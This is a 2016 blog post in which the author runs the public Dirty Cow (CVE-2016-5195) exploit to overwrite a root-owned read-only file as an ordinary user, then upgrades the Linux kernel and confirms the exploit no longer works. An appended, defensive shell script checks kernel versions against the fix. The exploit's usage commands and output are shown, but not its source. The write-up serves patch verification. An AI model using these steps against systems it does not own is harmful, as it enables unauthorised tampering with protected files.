Saturday 12 November 2016

Dirty Cow and Slackware


Dirty Cow, or CVE-2016-5195, is a formidable exploit. It works on most Linux versions, including Android. Here is a news article for easier reading.

I downloaded the exploit here and followed the instructions in dirtyc0w.c:

####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################

Compiling the program was no trouble:

~/dirtycow/dirtycow.github.io-master$gcc -pthread dirtyc0w.c -o dirtyc0w

Setting up for the exploit, using the root account:

/home/heong/dirtycow/dirtycow.github.io-master$echo 'This is not a test' > foo
/home/heong/dirtycow/dirtycow.github.io-master$chmod 0404 foo
/home/heong/dirtycow/dirtycow.github.io-master$ls -lah foo
-r-----r-- 1 root root 19 Nov 13 12:46 foo
/home/heong/dirtycow/dirtycow.github.io-master$cat foo
This is not a test
/home/heong/dirtycow/dirtycow.github.io-master$exit
exit
~/dirtycow/dirtycow.github.io-master$cat foo
This is not a test

And the attack worked when run as a non-root user:

~/dirtycow/dirtycow.github.io-master$./dirtyc0w foo youdirtycow
mmap 7fd267f8f000
madvise 0
procselfmem 1100000000
~/dirtycow/dirtycow.github.io-master$cat foo
youdirtycow a test

Even worse, it worked on the Linux kernel I was currently running, 4.6.2. This called for a new kernel. The newest stable kernel was 4.8.7:

$rm /usr/src/linux
$ln -s /home/heong/Linux/linux-4.8.7 /usr/src/linux
$cd /usr/src/linux
/usr/src/linux$cp -ap /home/heong/Linux/linux-4.6.2/.config .
/usr/src/linux$make oldconfig
/usr/src/linux$make -j20 bzImage
/usr/src/linux$make -j20 modules
/usr/src/linux$make modules_install

Now copy the new kernel to the boot directory to be loaded:

/usr/src/linux$cp .config /boot/config
/usr/src/linux$cp System.map /boot/
/usr/src/linux$cp -a arch/x86/boot/bzImage /boot/
/usr/src/linux$liloconfig

Reboot the laptop:

/usr/src/linux$reboot

Setting up for the test again, as root:

/home/heong/dirtycow/dirtycow.github.io-master$echo 'This is not a test' > foo
/home/heong/dirtycow/dirtycow.github.io-master$chmod 0404 foo
/home/heong/dirtycow/dirtycow.github.io-master$exit
exit
~/dirtycow/dirtycow.github.io-master$cat foo
This is not a test
~/dirtycow/dirtycow.github.io-master$ls -lah foo
-r-----r-- 1 heong users 19 Nov 13 15:21 foo

Now Dirty Cow is rebuffed:

~/dirtycow/dirtycow.github.io-master$./dirtyc0w foo thishadbetterwork
mmap 7f695f9c7000
madvise 0
procselfmem 1700000000
~/dirtycow/dirtycow.github.io-master$cat foo
This is not a test

Now I only have to upgrade every Linux computer I own ... :7(
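To decide which machines need the rebuild without running dirtyc0w on each of them, here is an added shell script (not from the original post) that takes a kernel release string in the form `uname -r` prints on Slackware (e.g. 4.4.14-smp) and reports whether it predates the CVE-2016-5195 fix. The per-branch minimum versions in the table are my assumptions based on the stable releases of 20 October 2016; the post itself only establishes that 4.6.2 is vulnerable and 4.8.7 is fixed, so verify the table against your distribution's advisory.

```shell
#!/bin/sh
# Added example: classify a kernel release string against the Dirty Cow fix.
# Branch minimums are ASSUMED from the 2016-10-20 stable releases; check them
# against your vendor's advisory. Mainline has the fix from 4.9 onwards.

# Strip any local suffix ("4.4.14-smp" -> "4.4.14") and print the numeric part.
kernel_numeric() {
    printf '%s\n' "$1" | sed 's/[^0-9.].*$//'
}

# kernel_at_least RUNNING MINIMUM -> exit 0 if RUNNING >= MINIMUM numerically,
# comparing major, minor and patch fields (missing fields count as 0).
kernel_at_least() {
    a=$(kernel_numeric "$1"); b=$(kernel_numeric "$2")
    i=1
    while [ "$i" -le 3 ]; do
        x=$(printf '%s\n' "$a" | cut -d. -f"$i"); x=${x:-0}
        y=$(printf '%s\n' "$b" | cut -d. -f"$i"); y=${y:-0}
        [ "$x" -gt "$y" ] && return 0
        [ "$x" -lt "$y" ] && return 1
        i=$((i + 1))
    done
    return 0
}

# dirtycow_status RELEASE -> prints "fixed", "vulnerable" or "unknown".
dirtycow_status() {
    rel=$(kernel_numeric "$1")
    if kernel_at_least "$rel" 4.9; then echo fixed; return; fi
    case "$(printf '%s\n' "$rel" | cut -d. -f1-2)" in
        4.8) min=4.8.3 ;;                      # assumed stable backport
        4.7) min=4.7.9 ;;                      # assumed stable backport
        4.4) min=4.4.26 ;;                     # assumed stable backport
        4.5|4.6) echo vulnerable; return ;;    # end-of-life branches, no fix
        *) echo unknown; return ;;             # older branch: ask your vendor
    esac
    if kernel_at_least "$rel" "$min"; then echo fixed; else echo vulnerable; fi
}

# Usage: check the kernel this machine is running right now.
dirtycow_status "$(uname -r)"
```

A result of "unknown" means the branch relies on a vendor backport (as with many 3.x distribution kernels), so the version number alone cannot settle it.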